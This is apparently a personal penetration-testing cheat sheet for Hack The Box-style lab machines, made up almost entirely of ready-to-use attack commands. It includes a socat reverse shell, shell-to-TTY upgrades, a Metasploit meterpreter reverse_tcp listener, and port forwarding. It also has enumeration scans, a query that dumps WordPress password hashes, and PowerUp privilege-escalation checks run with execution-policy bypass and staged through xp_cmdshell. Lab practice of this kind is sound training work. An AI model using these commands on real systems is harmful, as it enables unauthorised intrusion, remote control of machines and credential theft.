Snippets

Get tab auto-completion in reverse shell

python -c 'import pty; pty.spawn("/bin/bash");'     # python3 -c 'import pty; pty.spawn("/bin/bash");'
# ^Z (background shell with ctrl+z)
stty raw -echo
fg      #(to foreground the shell)
stty rows 45 cols 205

#### Fix TERM variable to allow clear
export TERM=xterm-256color

Another nmap approach

nmap -F 10.10.10.22                  # fast scan of the most common ports to find what is open
nmap -A -p22,80,443 10.10.10.22      # then scan those ports in depth

Metasploit Listener

# unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.22
set LPORT 1337
set ExitOnSession false
set EnableStageEncoding true
exploit -j


msfconsole -r unicorn.rc

Box setup & enumeration workflow

export IP_ADR="10.10.10.40"
cd ~/Documents/htb/boxes/

tmux
openvpn /root/Documents/htb/Glasgow.ovpn

#tmux new-window -c "#{pane_current_path}"

nmap -sC -sV -oA nmap $IP_ADR

nmap -T4 -A -v $IP_ADR

uniscan -u $IP_ADR -qweds

dirb http://$IP_ADR /usr/share/wordlists/dirb/common.txt -o dirb_output.txt

Socat Commands

# listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat file:`tty`,raw,echo=0 tcp-listen:4447,reuseaddr

# port forward
socat TCP-LISTEN:9992,fork TCP:10.10.14.22:9992 &

# reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:172.19.0.4:9992 &

SSH port forwarding

https://www.ssh.com/ssh/tunneling/example

ssh -L <localport>:<remote_address_to_forward_to>:<remote_port> user@ssh-ip-address

Remove 1st line from output

sed '1d' file.txt > tmpfile; mv tmpfile file.txt # POSIX
sed -i '1d' file.txt # GNU sed only, creates a temporary file

perl -pi -e '$_ = undef if $. == 1' file.txt # also creates a temporary file; -p must precede -i, since "-ip" is parsed as -i with backup suffix "p" and no -p loop

Connecting to a MySQL database & extracting WordPress hashes

mysql --host=HOSTNAME --user=USERNAME --password=PASSWORD

use wp
select concat_ws(':', user_login, user_pass) from wp_users;

Run a PowerShell script function from cmd

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\mssql-svc\Desktop\PowerUp.ps1; Invoke-AllChecks}"

Use impacket-smbserver to send files to box:

impacket-smbserver -smb2support files `pwd`

xp_cmdshell xcopy \\10.10.14.25\files\PowerUp.ps1 C:\Users\mssql-svc\Desktop\